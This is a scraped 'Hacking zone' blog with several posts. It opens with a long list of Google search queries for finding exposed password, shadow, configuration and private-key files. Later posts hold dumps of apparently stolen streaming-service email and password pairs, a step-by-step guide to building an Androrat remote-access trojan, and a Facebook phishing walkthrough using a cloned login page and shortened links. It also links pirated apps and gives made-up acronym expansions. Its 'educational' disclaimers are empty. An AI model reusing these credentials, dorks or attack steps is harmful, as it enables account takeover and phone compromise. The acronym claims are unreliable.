filetype:bak inurl:”htaccess|passwd|shadow|htusers”
filetype:cfg mrtg “target
filetype:cfm “cfapplication name” password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings “User ID”
filetype:dat “password.dat”
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:”serv-u.ini”
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log “See `ipsec –copyright”
filetype:log inurl:”password.log”
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
filetype:reg reg +intext:”defaultusername” +intext:”defaultpassword”
filetype:reg reg +intext:â? WINVNC3â?
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql “insert into” (pass|passwd|password)
filetype:sql (“values * MD5” | “values * password” | “values * encrypt”)
filetype:sql +”IDENTIFIED BY” -cvs
filetype:sql password
filetype:url +inurl:”ftp://” +inurl:”;@”
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:”enable password 7″
intext:”enable secret 5 $”
intext:”EZGuestbook”
intext:”Web Wiz Journal”
intitle:”index of” intext:connect.inc
intitle:”index of” intext:globals.inc
intitle:”Index of” passwords modified
intitle:”Index of” sc_serv.conf sc_serv content
intitle:”phpinfo()” +”mysql.default_password” +”Zend s?ri?ting Language Engine”
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of intext:”secring.skr”|”secring.pgp”|”secring.bak”
intitle:rapidshare intext:login
inurl:”calendars?ri?t/users.txt”
inurl:”editor/list.asp” | inurl:”database_editor.asp” | inurl:”login.asa” “are set”
inurl:”GRC.DAT” intext:”password”
inurl:”Sites.dat”+”PASS=”
inurl:”slapd.conf” intext:”credentials” -manpage -“Manual Page” -man: -sample
inurl:”slapd.conf” intext:”rootpw” -manpage -“Manual Page” -man: -sample
inurl:”wvdial.conf” intext:”password”
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial -download
filetype:bkf bkf
filetype:blt “buddylist”
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:”Subject” +intext:”From” +intext:”To”
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -“cvs log”
filetype:fp7 fp7
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
intext:”Session Start * * * *:*:* *” filetype:log
intext:”Tobias Oetiker” “traffic analysis”
intext:(password | passcode) intext:(username | userid | user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intitle:”Athens Authentication Point”
intitle:”b2evo > Login form” “Login form. You must log in! You will have to accept cookies in order to log in” -demo -site:b2evolution.net
intitle:”Cisco CallManager User Options Log On” “Please enter your User ID and Password in the spaces provided below and click the Log On button to co
intitle:”ColdFusion Administrator Login”
intitle:”communigate pro * *” intitle:”entrance”
intitle:”Content Management System” “user name”|”password”|”admin” “Microsoft IE 5.5″ -mambo
intitle:”Content Management System” “user name”|”password”|”admin” “Microsoft IE 5.5″ -mambo
intitle:”Dell Remote Access Controller”
”This is a Shareaza Node”
”This report was generated by WebLog”
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject
(intitle:”PRTG Traffic Grapher” inurl:”allsensors”)|(intitle:”PRTG Traffic Grapher – Monitoring Results”)
(intitle:WebStatistica inurl:main.php) | (intitle:”WebSTATISTICA server”) -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob
(inurl:”robot.txt” | inurl:”robots.txt” ) intext:disallow filetype:txt
+”:8080″ +”:3128″ +”:80″ filetype:txt
+”HSTSNR” -“netop.com”
-site:php.net -“The PHP Group” inurl:source inurl:url ext

For educational purposes

Friday, March 30, 2018

Hacking zone:THESE ARE THE MEANING OF THE FOLLOWING ABBREVIATIONS.

March 30, 2018 0 Comments
👍👍👍👍
THESE ARE THE MEANING OF THE FOLLOWING  ABBREVIATIONS.           

1.) *GOOGLE* - Global Organization Of Oriented Group Language Of Earth.
2.) *YAHOO* - Yet Another Hierarchical Officious Oracle.
3.) *WINDOW* - Wide Interactive Network Development for Office work Solution.
4.) *COMPUTER* - Common Oriented Machine Particularly United and used under Technical and Educational Research.
5.) *VIRUS* - Vital Information Resources Under Siege.
6.) *UMTS* - Universal Mobile Telecommunicati ons System.
7.) *AMOLED* - Active-matrix organic light-emitting diode.
8.) *OLED* - Organic light-emitting diode.
9.) *IMEI* - International Mobile Equipment Identity.
10.) *ESN* - Electronic Serial Number.
11.) *UPS* - Uninterruptible power supply.
12. *HDMI* - High-Definition Multimedia Interface.
13.) *VPN* - Virtual private network.
14.) *APN* - Access Point Name.
15.) *SIM* - Subscriber Identity Module.
16.) *LED* - Light emitting diode.
17.) *DLNA* - Digital Living Network Alliance.
18.) *RAM* - Random access memory.
19.) *ROM* - Read only memory.
20.) *VGA* - Video Graphics Array.
21.) *QVGA* - Quarter Video Graphics Array.
22.) *WVGA* - Wide video graphics array.
23.) *WXGA* - Widescreen Extended Graphics Array.
24.) *USB* - Universal serial Bus.
25.) *WLAN* - Wireless Local Area Network.
26.) *PPI* - Pixels Per Inch.
27.) *LCD* - Liquid Crystal Display.
28.) *HSDPA* - High speed down-link packet access.
29.) *HSUPA* - High-Speed Uplink Packet Access.
30.) *HSPA* - High Speed Packet Access.
31.) *GPRS* - General Packet Radio Service.
32.) *EDGE* - Enhanced Data Rates for Globa Evolution.
33.) *NFC* - Near field communication.
34.) *OTG* - On-the-go.
35.) *S-LCD* - Super Liquid Crystal Display.
36.) *O.S* - Operating system.
37.) *SNS* - Social network service.
38.) *H.S* - HOTSPOT.
39.) *P.O.I* - Point of interest.
40.) *GPS* - Global Positioning System.
41.) *DVD* - Digital Video Disk.
42.) *DTP* - Desk top publishing.
43.) *DNSE* - Digital natural sound engine.
44.) *OVI* - Ohio Video Intranet.
45.) *CDMA* - Code Division Multiple Access.
46.) *WCDMA* - Wide-band Code Division Multiple Access.
47.) *GSM* - Global System for Mobile Communications.
48.) *WI-FI* - Wireless Fidelity.
49.) *DIVX* - Digital internet video access.
50.) *APK* - Authenticated public key.
51.) *J2ME* - Java 2 micro edition.
52.) *SIS* - Installation source.buraakiller
53.) *DELL* - Digital electronic link library.
54.) *ACER* - Acquisition Collaboration Experimentation Reflection.
55.) *RSS* - Really simple syndication.
56.) *TFT* - Thin film transistor.buraakiller
57.) *AMR*- Adaptive Multi-Rate.
58.) *MPEG* - moving pictures experts group.
59.) *IVRS* - Interactive Voice Response System.
60.) *HP* - Hewlett
 Packard.

Monday, March 26, 2018

Hacking zone :How To Make Google Chrome Browse More Faster With These 4 Steps

March 26, 2018 0 Comments
How To Make Google Chrome Browse More Faster With These 4 Steps

The method is very simple and we will be editing some hidden feature of chrome in this method and with that you chrome speed will boost up and it will browse webpages faster. So follow up the below methods to proceed:

#1 Method: Editing Chrome Flag Settings To Make It Faster

1. First of all open the address chrome://flags/ in your Google chrome.

2. Now there you will see lots of settings there.

3. Search out for "Maximum tiles for interest area" and change its value to 512 that is maximum RAM that you will be allocating to the Chrome.( You can use ctrl+f to find these options).

4. Now search For the "Number of raster threads" and change its value to 4.

5. Now enable "Enable fast tab/window close".

6. That's it now relaunch your browser and enjoy the faster performance of your browser.

#2 Method: Using Google Chrome Extension
1. Download and install a cool plugin
Web Boost in your Google chrome.

2. Thats it this extension will get added to your browser and you can see icon at the right top corner, just click on it to start it.

#3 Method: Changing The Settings In Google Chrome

1. First of all go to three line button at the the top right corner of your Google chrome.

2. Then click on "settings" and then "Show Advanced Settings"
.
3. Now under privacy look for "Prefetch resources to load pages more quickly" and tick on it.

4. There you will have 3 options listed in your android chrome which can be set according to as:
Always :- If you want to load pages both on cellular and wifi network.
Wifi – If only wifi connection is there then only it will load prefetch pages.
Never :- It will never prefetch pages and this can save your data on your limited connection.

#4 Method: Clearing Cache & unnecessary Plugins and Extensions

1. Type chrome://plugins/ in your google chrome and clear out or say remove the plugins that are unnecessary in your browser.

2. Type chrome://extensions/ in your chrome browser and clear all the extension that you don’t need in your browser.

3. Type chrome://settings/clearBrowserData and clear all your history from beginning including history, cache file and all other saved data of your browser to make it faster.

With these ways you can easily boost up your browser speed and can enjoy fast switching speed between tabs.

@Hackbust

Saturday, March 17, 2018

Hacking zone :premium account for free for educational purposes only

March 17, 2018 0 Comments
Spotify Premium Accounts

@premiumhub

Email & Password: michaelvonplon@gmail.com:cheese99
Subscription: Premium For Family
Renew: 3/23/18
Country: CH
================================================
Email & Password: amanda-harrison@live.co.uk:donkey28
Subscription: Premium For Family
Renew:
Country: GB
==========================================
Email & Password: marshypillo@gmail.com:homework1
Subscription: Premium
Renew: 3/18/18
Country: US
================================================
Email & Password: robertostar@hotmail.it:semini
Subscription: Premium For Family
Renew: 3/18/18
Country: IT
=====================================
Email & Password: grahlreinbek@aol.com:25091954
Subscription: Premium For Family
Renew: 4/1/18
Country: DE
================================================
Email & Password: robertostar@hotmail.it:semini
Subscription: Premium For Family
Renew: 3/18/18
Country: IT
=====================================

Don't Change Password

@premiumhub

HULU Premium Accounts

@premiumhub

ariannaheble@gmail.com:mickayla1

aramos24@sweetwaterschools.net:04102001

aracelyvelasquez10@gmail.com:aracely10
HBO NOW Premium Accounts

@premiumhub

tsuluscrivens@gmail.com:paterson27 - HBO Premium

travisrice66@gmail.com:1234asdf - HBO Premium

tony.jacm@hotmail.com:20032134g - HBO Premium

tito20pr@gmail.com:carmen56 - HBO Premium

thecameronfrank@yahoo.com:hello123 - HBO Premium

@premiumhub
apminton@gmail.com:rom1212

anya.lavinia@gmail.com:soccerball

antone1013@Yahoo.com:fishing13

antaylor1@gmail.com:ashley12

anniele2012@gmail.com:jello.

anniekaus@hotmail.com:cougars31

Enjoy its free

@premiumhub



Spotify Premium Accounts

@premiumhub

ocstevet@yahoo.com:sregnar9|Premium

joel.p.14@hotmail.com:starwars66|Premium

talhatorun1@hotmail.com:asdqwe19|Premium

sk8anton@hotmail.com:quando1|Premium

jcfern6192@hotmail.com:christopher1|Premium

eliasv111111@gmail.com:elias1234|Premium

jordanetje@hotmail.com:jvm7556702|Premium

ian.martensen@yahoo.com:modz4real|Premium

alekst@inbox.lv:6881445|Premium

ps.glaser@googlemail.com:jannes|Premium

davidfairclough1992@gmail.com:defence1|Premium

Enjoy Its Free

@premiumhub

For educational purposes only

Hacking zone :How to hacking android phone with androrat

March 17, 2018 0 Comments
How To Hack Android Phones With Androrat


In this post i am going to show you how to hack Android phones withAndrorat. In our tutorials we only EVER hack our own systems as a proof of concept and never engage in any black hat activity.

Step1: Create an account on noip.com.

Step2: Create a host on noip.com and enter Hostname and click Add Host

Step3: Now do port forwarding on your network. Port forwarding settings changes on each moderm, so google your moderm and find out how to do port forwarding

Step4: Download Androrat Binder and enter the Hostname  and Port. Name the file and click Go. If you want to inject this file with another .apk file then go to Build + Bindtab name apk title and browse the location of the .apk and click Go.

Step5: Now download DUC (Dynamic DNS Update Client for Windows) and install

Step6: Open DUC and enter the host details which you have created in noip.com

Step7: Download and run Androrat Project. Open Server tab on top and enter theport which you use on noip.com

Step8: Now run the .apk which is created by Androrat Binder on a Android Mobile.

@The_blackhat

Hacking zone : news for hacking

March 17, 2018 0 Comments
Tech News By @The_blackhat

👉Popular Indie Title Florence Is Now Available on Android

👉Fitbit's Chief Financial Officer Takes a Jab at Apple Watch

👉Amazon Receives a Patent to Drop Packages from a Drone on Your Doorstep

👉WhatsApp Now Allows Group Description, Switching Between Video and Voice Calls, and More

👉Tez Now Offers Scratch Cards for Purchases Made on Mi.com

👉Thousands of Aadhaar Cards Are Just a Google Search Away from Being Misused

👉Ubisoft Announces a June 29 Launch Date for ‘The Crew 2’

👉Xiaomi Redmi Note 5 in China Features a Superior f/1.9 Aperture Rear Camera

👉Honor 9 Lite Gets "Ride Mode" to Prevent Distraction While Riding Bike

👉SwiftKey Keyboard Updated With New Toolbar, Editable Stickers, and More

👉Samsung and Xiaomi Phones Affected by ‘RottenSys’ Malware

👉Fortnite Surges to Become the Top iPhone Game in US

👉LinkedIn Learning and Google Partner for Android Development Courses

👉Spotify to Launch in India Soon, CEO Confirms at Investors Pitch Before IPO

👉Xperia XZ2 and XA2 Series Come With Project Treble Support

👉Android Users in India Twice as Likely to be Affected by Malware: Google

👉Poweramp Music Player to Receive Major Overhaul, Beta Testing to Begin in April

👉ARCore Apps Make Their Way to the Play Store

👉Russia Hacked US Power Grids, FBI Says

👉Apple's App Store Is No Longer Available in Iran

Don't forget to share
@The_blackhat
For educational purposes only

Hacking zone : how to facebook account with by Kali Linux

March 17, 2018 0 Comments
Hello, everyone ,
Today i am going to show you one method to hack Facebook account for you , using Kali-Linux.
It is like phishing method but don't worry , you don't need to do all that heavy steps again,it is very simple all the stuffs(steps) is done by Kali Linux ....


NOTE-  THIS IS FOR EDUCATIONAL PURPOSE ONLY,  PLEASE DON'T DO ANYTHING  ILLEGAL.

Requirements:
1- Laptop or Computer.
2- Net connection with speed.
3-  Kali Linux installed system or bootable pendrive with kali linux .

Process:
1) Open terminal using " CTRL + ALT + T "
2)  type " sudo root " command (if you are not a root user)
3)  enter your password
4)  do all three steps if you are
not a root user.

Now,main steps

5) go to " Application " on the top left hand side
6) then  go to " kali linux "
7) then go to " Exploitation tools"
8) then go to " social engineering toolkit "
9) then go to " setoolkit "

Now it will show you some options -

10) press " 1 " for Social Engineering Attacks
11) press " 2 " for Website Attect Vector
12) press " 3 " for Credential Harvesting Attect method
13) press " 2 " for Site Cloner
14) now it will ask you " Harvester/Tabnabbing "

15) now, open new terminal by pressing " CTRL + ALT + T "
16) type " ifconfig " it will help you to show your ip address
17) copy your ip address and paste after  Harvester/Tabnabbing : XXX.XX.XX.XXX
18) then it will ask a website name- enter - " www.facebook.com ".

*19) now the most important step
        now change your XXXXXXXXXX (number or ip-address) to link like                             www.facebook.com/pages/for/hack......etc.
by using services like ADF.LY ,  Goo.gl, Binbox, etc.

20) now , you send that ip address to the victim/tragets by email /WhatsApp / mail.
21)when every victim/targeted user click on your link & enter id & passwords....it will save in your system in 
Home--> Root-->  var --> www--> xyz.txt
@Dev2003
For educational purposes

Hacking zone :📲: Pro Apps Update [04.02.2018]

March 17, 2018 0 Comments
📲: Pro Apps Update [04.02.2018]

━━━━━━━━━━━━━━━━━━━

━━━━━━━━━━━━━━
15+ 🆕 Latest Most Wanted Pro Apps Updated
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

💎Material Notification Shade v10.67 [Pro]
https://uplod.cc/sbaj0uydun6p

💎Terrarium TV - HD Movies and TV Shows v1.9.2 [Premium]
https://uplod.cc/7w0gdvs41l3y

😍Deezer Downloader v1.4.12
https://uplod.cc/4mi4h09ojtoj

💎Deezer Downloader v1.4.13 Beta
https://uplod.cc/05gqn9jm6wir

💎PlayerPro Music Player v4.6 build 165 [Paid]
https://uplod.cc/csm6ay5g3jwf

💎Pi Music Player v2.5.7 build 91 [Unlocked]
https://uplod.cc/2xwj5lunt122

💎ES File Explorer File Manager v4.1.7.1.13 [Mod]
https://uplod.cc/27funxg9fxzi

💎AdClear v8.0.0.506795 [Non-Root Full-Version Ad Blocker]
https://uplod.cc/6prll9ygiayd

💎Send Anywhere (File Transfer) v8.2.2 [Unlocked]
https://uplod.cc/ksozvyq78722

💎Shortcutter Quick Settings​ & Sidebar v5.1.2 [Premium]
https://uplod.cc/kkukcuhk64j0

💎ZArchiver Pro v0.9.1 [Test3]
https://uplod.cc/wlhgrdcuv1bn

💎RAR for Android Premium v5.60 build 48 Final
https://uplod.cc/a4hfppt1fbtt

💎WA Tweaks for WhatsApp v2.7.4
https://uplod.cc/v11mwzbzx31t

💎Telegram X v0.20.4.804
https://uplod.cc/jac61p888hyz (arm)
https://uplod.cc/3wcv5rts9gtrv (arm64)

💎Photo Lab PRO Picture Editor v3.0.20 [Patched]
https://uplod.cc/4oylbo4yeomx

💎ZEDGE™ Ringtones & Wallpapers v5.37b148 (53714805) [Ad-Free]
https://uplod.cc/zigztt5qanrr

💎Free Adblocker Browser v60.0.2016123025
https://uplod.cc/j2iz2mh1u814

15+ 🆕 Latest Most Wanted Pro Apps
━━━━━━━━━━━━━━━━━━━
━━━━━━━━━━━━━
For educational purposes

Hacking zone :premium account free

March 17, 2018 0 Comments
SPOTIFY PREMIUM ACCOUNTS

kjones0427@gmail.com:csny1982|Subscription:Spotify Premium|Renew:4/9/18|Country:US

stellagoh.sg@gmail.com:stella11|Subscription:Premium For Family|Renew:4/6/18|Country:SG

amiranda2310@gmail.com:tony3151|Subscription:Spotify Premium|Renew:|Country:US

amandamaistro@gmail.com:171186|Subscription:Spotify

SPOTIFY Premium Accounts

clayltd@hotmail.com:skistave090988|PREMIUM
camaroz285l@gmail.com:traxxas5|PREMIUM
lowbjohnny@hotmail.com:11271127|PREMIUM
danbrousseau@gmail.com:101011car|PREMIUM
amforman@Yahoo.com:sammy21|PREMIUM
megamegaben@gmail.com:lodidodi|PREMIUM

Send SS if they work for you!
👇👇👇


@freeherebot

For educational for porpurse

Hacking toturial

March 17, 2018 0 Comments
Certified Ethical Hacker (CEH) version 9 tool kit + PDF Slides free download
TOTAL size 32.8 GB

PART 1-(2GB)

http://destyy.com/waFvd2

PART 2-(2GB)

http://destyy.com/waFvU7

PART 3-(2GB)

http://destyy.com/waFvCV

PART 4-(2GB)

http://destyy.com/waFbtP

PART 5-(2GB)

http://destyy.com/waFbkF

PART 6-(2GB)

http://destyy.com/waFbPE

PART 7-(2GB)

http://destyy.com/waFbVW

PART 8-(2GB)

http://destyy.com/waFb7k

PART 9-(2GB)

http://destyy.com/waFntw

PART 10-(2GB)

http://destyy.com/waFndT

PART 11-(2GB)

http://destyy.com/waFnnQ

PART 12-(2Gb)

http://destyy.com/waFnOM

PART 13-(2GB)

http://destyy.com/waFnZp

PART 14-(2GB)

http://destyy.com/waFmtS

PART 15-(2GB)

http://destyy.com/waFmlp

PART 16-(2gb)

http://destyy.com/waFmWs

PART 17-(891MB)

http://destyy.com/waFmD8

ENJOY DON'T FORGET TO SHARE
By:- @HackersTech1